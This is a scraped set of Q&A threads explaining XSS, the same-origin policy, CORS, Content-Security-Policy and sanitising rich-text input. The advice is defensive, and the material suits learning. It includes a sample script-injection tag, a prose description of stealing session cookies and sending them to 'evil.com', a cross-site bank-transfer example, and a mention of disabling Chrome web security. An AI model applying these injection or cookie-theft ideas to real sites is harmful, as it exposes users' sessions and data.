XSS still possible in modern browsers - javascript

I was curious, whether XSS is still possible today. I read a lot about browsers preventing it, but I seem I have missed something.
I tried a couple approaches myself, including the simplest ways, AJAX calls (luckily blocked by the browser) and viewing the content of an <iframe> and <frameset>, no success either way.
I read about DOM XSS, but that will only work, if the host has a page where it echoes content from the URL parameters.
Question:
Are modern browsers safe or are there any reasons why I should logout of every service I use before leaving a page?

whether XSS is still possible today.
Yes, it is.
will only work, if the host has a page where it echoes content from the URL parameters.
XSS is possible when any user input is output (either immediately (for a reflected attack) or later, possible to a different person (for a stored attack). That is what XSS is.
The Same Origin Policy (and related security features that prevent access to content on a different origin) has nothing to do with XSS.
Are modern browsers safe
XSS is a vulnerability in code provided by the server that takes user input and does something with it. There is no way to tell if user input is an XSS attack or a legitimate submission of data that includes live code. It has to be dealt with by server provided code since the input has to be treated with context sensitivity.

Related

PHP $_SERVER['HTTP_REFERER'] vs. Javascript document.referrer?

Ultimately I need to know what domain is hosting one of my javascript files. I have have read and experienced first hand that $_SERVER['HTTP_REFERER'] unreliable. One of the first 3 browser/computer combos I tested didn't send the HTTP_REFERER, and I know that it can be spoofed. I implemented a different solution using two javascript methods.
document.referrer
AND
window.location.href
I use the former to get the url of the window where someone clicked on one of my links. I use the former to see which domain my javascript file is included in. I have tested it a little so far and it is grabbing the urls from the browser very well with no hiccups. My question is, are the two javascript methods reliable? Will they return the url from the browser everytime or are there caveats like using the $_SERVER['HTTP_REFERER'] that I haven't run into yet?
You should always assume that any information about the referrer URI is going to be unavailable (or perhaps even unreliable), due to browsers or users wanting to conceal this information because of privacy issues.
In general, you won't have the referrer information when linking from an HTTPS to an HTTP domain. Check this question for more info on this:
https://webmasters.stackexchange.com/questions/47405/how-can-i-pass-referrer-header-from-my-https-domain-to-http-domains
About using window.location.href, I'd say it's reliable in practice, but only because it's interesting that the client will supply the correct information so that applications depending on that will behave as expected.
Just keep in mind that this is still the client side sending you some information, so it'll always be up to the browser to send you something that is correct. You can't have control over that, just trust that it's going to work according to what is specified in the standard. The client might still decide to conceal it or fake it for any reason.
For example it might be possible that in some situations, like third party included scripts (also privacy reasons), the browser might opt to just leave it blank.

tinymce storing generated markup in database security concerns

I have used tinymce as a part of a forum feature on my site. I am taking the innerHTML of the textarea and storing it inside a SQL database.
I retrieve the markup when viewing thread posts.
Is there any security concerns doing what I am doing? Does tinymce have any inbuilt features to stop malicious content / markup being added and therefore saved?
TinyMce does a pretty good job ant content scrubbing and input cleanup (on the client side). Being a very popular web rich text editor, the creators have spent a lot of work on making it fairly secure in terms of preventing simple copy and paste of malicious content in to the editor. You can do things like enable/disable cleanup, specify what tags/attributes/characters are allowed, etc.
See the TinyMce Configurations Page. Options of note include: valid_elements, invalid_elements, verify_html, valid_styles, invalid_styles, and extended_valid_elements
Also: instead of grabbing the innerHtml of the textarea, you should probably use tinyMce's getContent() function. see: getContent()
BUT this is all client-side javascript!
Although these featuers are nice, all of this cleanup still happens on the client. So conceivably, the client JS could be modified to stop escaping/removing malicious content. Or someone could POST bad data to your request handlers without ever going thru the browser (using curl, or any other number of tools).
So tinyMce provides a nice baseline of client scrubbing, however to be secure, the server should assume that anything it is being sent is dirty and should thus treat all content with caution.
Things that can be done by the server:
Even if you implement the most sophisticated client-side validation/scrubbing/prevention, that is worthless as far as your backend's security is concerned. An excellent reference for preventing malicious data injections can be found on the OWASP Cross Site Scripting Prevention Cheat Sheet and the OWASP SQL Injection Prevention Cheat Sheet. Not only do you have to protect against SQL injection type attacks, but also XSS attacks if any user submitted data will be displayed on the website for other unsuspecting users to view.
In addition to sanitizing user input data on the server, you can also try things such as mod_security to squash requests that contain certain patterns that are indicative of malicious requests. You can also enforce max length of inputs on both the client and server side, as well as adding a max request size for your server to make sure someone doesn't try and send a GB of data. How to set a max request size will vary from server to server. Violations of max request size should result in a HTTP 413/Request Entity Too Large
Further to #jCuga's excellent answer, you should implement a Content Security Policy on any pages where you output the rich text.
This allows you to effectively stop inline script from being executed by the browser. It is currently supported by modern browsers such as Chrome and Firefox.
This is done by a HTTP response header from your page.
e.g.
Content-Security-Policy: script-src 'self' https://apis.google.com
will stop inline JavaScript from being executed if a user managed to inject it into your page (it will be ignored with a warning), but will allow script tags referencing either your own server or https://apis.google.com. This can be customised to your needs as required.
Even if you use a HTML sanitizer to strip any malicious tags, it is a good idea to use this in combination with a CSP just in case anything slips through the net.

Why will disabling Browser Web Security (e.g. Chrome) help doing Cross-Site-Requests?

We have several internal web applications. One of those needs to access all the other applications. Problem is: Same-Orign-Policy.
Actually I did manage to get around it. First of all, the IE is quite sloppy what concerns web security. So, it actually asked me whether I want to have these requests done or not. If I clicked yes, he just executed the cross site requests.
But since most of the users won't use IE, there was the need to make it run in another browser.
So, I tried to make it run in Google Chrome. And after some research I found out, that it will work when I turn of the Web Security by using the execution parameter --disable-web-security.
This did the job. But unfortunately, most of the users won't be using this execution parameter. Therefore I need another solution.
Then I came across CORS. CORS seems to be implemented in Chrome, but it has one drawback (for me). I need to set headers on the server side.
For reasons I won't discuss in here, this is a no go.
So what I was actually wondering about is:
Why will disabling Browser's Web Security do the job, while I need the server to allow the request when using CORS?
What exactly happens inside the browser when I disable the web security?
And is there another way to execute my CSR without adding headers on the server's side or disabling the security?
Thanks in advance
EDIT: JSONP is out of question either
Why will disabling Browser's Web Security do the job, while I need the server to allow the request when using CORS?
The point of the Same Origin Policy is to prevent Mallory's evil site from making Alice's browser go to Bob's site and expose Alice's data to Mallory.
Disabling security in the browser is, effectively, saying "I don't care about protecting my data on Bob's (or any other!) site". This is a dangerous thing to do if the browser is ever going to go near the open web. The option is provided to make development more convenient — I prefer a more controlled solution (such as the URL rewriting options in Charles proxy).
CORS is Bob's site saying "This URL doesn't contain any data that Mallory (or some other specific site, or everyone) shouldn't have access to, so they can access it. Bob's site can do this because it knows which parts of it contain public data and which parts contain private data.
What exactly happens inside the browser when I disable the web security?
It disables the aforementioned security feature and reduces the protection of the user's data.
And is there another way to execute my CSR without adding headers on the server's side or disabling the security?
A proxy. See Ways to circumvent the same-origin policy, specifically the Reverse Proxy method.
I guess you are using AJAX requests, here is another question Ways to circumvent the same-origin policy that has a big detailed answer.
You can use a Flash object (flash doesn't have this problem)
Also about "whats the worst could happen" http://blogs.msdn.com/b/ieinternals/archive/2009/08/28/explaining-same-origin-policy-part-1-deny-read.aspx and http://en.wikipedia.org/wiki/Cross-site_scripting

Prevent HTML form action from being changed

I have a form on my page where users enter their credit card data. Is it possible in HTML to mark the form's action being constant to prevent malicious JavaScript from changing the form's action property? I can imagine an XSS attack which changes the form URL to make users posting their secret data to the attacker's site.
Is it possible? Or, is there a different feature in web browsers which prevents these kinds of attacks from happening?
This kind of attack is possible, but this is the wrong way to prevent against it. If a hacker can change the details of the form, they can just as easily send the secret data via an AJAX GET without submitting the form at all. The correct way to prevent an XSS attack is to be sure to encode all untrusted content on the page such that a hacker doesn't have the ability to execute their own JavaScript in the first place.
More on encoding...
Sample code on StackOverflow is a great example of encoding. Imagine what a mess it would be if every time someone posted some example JavaScript, it actually got executed in the browser. E.g.,
<script type="text/javascript">alert('foo');</script>
Were it not for the fact that SO encoded the above snippet, you would have just seen an alert box. This is of course a rather innocuous script - I could have coded some JavaScript that hijacked your session cookie and sent it to evil.com/hacked-sessions. Fortunately, however, SO doesn't assume that everyone is well intentioned, and actually encodes the content. If you were to view source, for example, you would see that SO has encoded my perfectly valid HTML and JavaScript into this:
<script type="text/javascript">alert('foo');</script>
So, rather than embedding actual < and > characters where I used them, they have been replaced with their HTML-encoded equivalents (< and >), which means that my code no longer represents a script tag.
Anyway, that's the general idea behind encoding. For more info on how you should be encoding, that depends on what you're using server-side, but most all web frameworks include some sort of "out-of-the-box" HTML Encoding utility. Your responsibility is to ensure that user-provided (or otherwise untrusted) content is ALWAYS encoded before being rendered.
Is there a different feature in web browsers which
prevents these kinds of attacks from happening?
Your concern has since been addressed by newer browser releases through the new Content-Security-Policy header.
By configuring script-src, you can disallow inline javascript outright. Note that this protection will not necessarily extend to users on older browsers (see CanIUse ).
Allowing only white-labeled scripts will defeat most javascript XSS attacks, but may require significant modifications to your content. Also, blocking inline javascript may be impractical if you are using a web frameworks that relies heavily on inline javascript.
Nope nothing to really prevent it.
The only thing I would suggest to do is have some server side validation of any information coming to the server from a user form.
As the saying goes: Never trust the user

What's the point of the Anti-Cross-Domain policy?

Why did the creators of the HTML DOM and/or Javascript decide to disallow cross-domain requests?
I can see some very small security benefits of disallowing it but in the long run it seems to be an attempt at making Javascript injection attacks have less power. That is all moot anyway with JSONP, it just means that the javascript code is a tiny bit more difficult to make and you have to have server-side cooperation(though it could be your own server)
The actual cross-domain issue is huge. Suppose SuperBank.com internally sends a request to http://www.superbank.com/transfer?amount=100&to=123456 to transfer $10,000 to account number 123456. If I can get you to my website, and you are logged in at SuperBank, all I have to do is send an AJAX request to SuperBank.com to move thousands of dollars from your account to mine.
The reason JSON-P is acceptable is that it is pretty darn impossible for it to be abused. A website using JSON-P is pretty much declaring the data to be public information, since that format is too inconvenient to ever be used otherwise. But if it's unclear as to whether or not data is public information, the browser must assume that it is not.
When cross-domain scripting is allowed (or hacked by a clever Javascripter), a webpage can access data from another webpage. Example: joeblow.com could access your Gmail while you have mail.google.com open. joeblow.com could read your email, spam your contacts, spoof mail from you, delete your mail, or any number of bad things.
To clarify some of the ideas in the questions into a specific use case..
The cross domain policy is generally not there to protect you from yourself. Its to protect the users of your website from the other users of your website (XSS).
Imagine you had a website that allowed people to enter any text they want, including javascript. Some malicious user decides to add some javascript to the "about yourself" field. Users of your website would navigate his profile and have this script executed on their browser. This script, since its being executed on your website's behalf, has access to cookies and such from your website.
If the browser allowed for cross domain communication, this script could theoretically collect your info and then upload it to a server that the malicious user would own.
Here's a distinction for you: Cross-domain AJAX allows a malicious site to make your browser to things on its behalf, while JSON-P allows a malicious server to tamper with a single domain's pages (and to make the browser do things to that domain on your behalf) but (crucial bit) only if the page served went out of its way to load the malicious payload.
So yes, JSON-P has some security implications, but they are strictly opt-in on the part of the website using them. Allowing general cross-domain AJAX opens up a much larger can of worms.

Categories

Resources